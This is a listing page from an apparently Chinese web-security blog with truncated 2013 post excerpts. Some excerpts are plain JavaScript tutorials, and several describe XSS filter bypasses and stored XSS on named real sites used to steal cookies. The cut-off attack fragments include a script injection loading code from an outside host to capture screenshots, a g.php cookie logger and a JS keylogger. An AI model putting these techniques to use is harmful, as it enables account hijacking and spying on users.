js代码

admin 12年前 (2013-10-23) 2951浏览 0评论

一、按键事件 二、按键码与按键字符 三、其他按键属性 四、浏览器兼容性总结 五、代码实现 六、总结 一、按键事件 浏览器有三种键盘按键事件:keyup、keydown、keypress，对应的事件处理函数有onkeyup、onkeydown、onke...

admin 12年前 (2013-09-21) 2201浏览 0评论

一个具有学习意义的XSS过滤器绕过 详细说明： 天涯过滤了一切JavaScript，治标不治本 漏洞证明： 这是目标页面 m.tianya.cn/sch/sch.jsp 1.我们先提交test试试 输出在了value属性 2.接下来我们用 R...

admin 12年前 (2013-09-16) 1675浏览 0评论

简要描述： 晚上在人人网随便转了转，随手测试了下，发现人人网某分站存在储存型xss，可以盲打后台管理，也可以盗取他人登录cookie（已经证明）。上传位置也有些问题，我做了初步检测，你们自己仔细查查吧，请别给个位数的rank额。 详细说明： 1 存在...

admin 12年前 (2013-08-29) 1930浏览 1评论

jQuery是我们用的最多的javascript函数库，占有率极高，wordpress原生自带，并且扩展性也很强。但是加载jQuery仅仅只是一行调用代码而已那么简单吗？事实上jQuery的正确调用方式，不一定所有人都知道并掌握。掌握正确的jQuer...

admin 12年前 (2013-08-20) 2242浏览 0评论

2个月前，长短短（Sogili）在群里发了一个html2canvas.js  并给了一个POC 我写了一个完整的js来获得对方的屏幕截图 看代码 document.write("<script src=\"http:\/\/xj.hk\/h...

admin 12年前 (2013-08-16) 2302浏览 1评论

转自：黑客安全文献http://www.weikt.com/blog/?p=108   某年、某月、某日，某事、某刻、某分、某秒，某人、某站、某代码的分析…… 起因如下，在某时某刻，某人发过来一站及一段代码，然后求分析…… 目标地址：htt...

admin 12年前 (2013-07-08) 5073浏览 0评论

一种Ajax网页内容的抓取方法及系统”专利   www.tecsoo.com下载   抓取AJAX网页的方法－Firefox组件，C#集成 现在AJAX的使用越来越广泛了，但是如果经常写网页抓取程序的人会发现，很多网页内容是通用AJAX进...

admin 12年前 (2013-06-28) 1600浏览 0评论

浏览器搜索框劫持钓鱼 http://h43z.koding.com/blog/leaked.html 如以上网站所显示，当你按下ctrl+f 或win+f  组合键是就会弹出一个搜索框其实这个所说框是黑客所伪造的。 攻击流程：当一名攻击者将一个...

admin 12年前 (2013-06-15) 1917浏览 0评论

一、”window.location.href”、”location.href”两个是一样的，代表当前窗口的url，因此在xss代码获取location.href的值就可以获取当前窗口的url值。当然如...

admin 12年前 (2013-06-15) 1484浏览 1评论

XMLHttpRequest 是 AJAX 的基础。 XMLHttpRequest 对象 所有现代浏览器均支持 XMLHttpRequest 对象（IE5 和 IE6 使用 ActiveXObject）。 XMLHttpRequest 用于在后...

admin 12年前 (2013-06-14) 3463浏览 1评论

本帖最后由 haxsscker 于 2013-5-31 12:06 编辑 ########################################## #  Title: 当XSS遇到后台限制登录或者HTTPONLY时，还能做什么？ #  ...

admin 12年前 (2013-06-13) 3873浏览 2评论

这种方法是非常公开的，但很多人仍然不知道它。 cookie时，从目标不能重复使用，您可以使用此方法。 你需要一台主机上传： g.php <?php $Keylog = $_GET["c"]; $reffer = $_SERVER['HTTP...

admin 12年前 (2013-06-13) 1406浏览 0评论

主要分四个部分 第一部分：浏览器的按键事件 第二部分：兼容浏览器 第三部分：代码实现和优化 第四部分：总结 第一部分：浏览器的按键事件 用 js实现键盘记录，要关注浏览器的三种按键事件类型，即keydown，keypress和keyup，它们分别对应...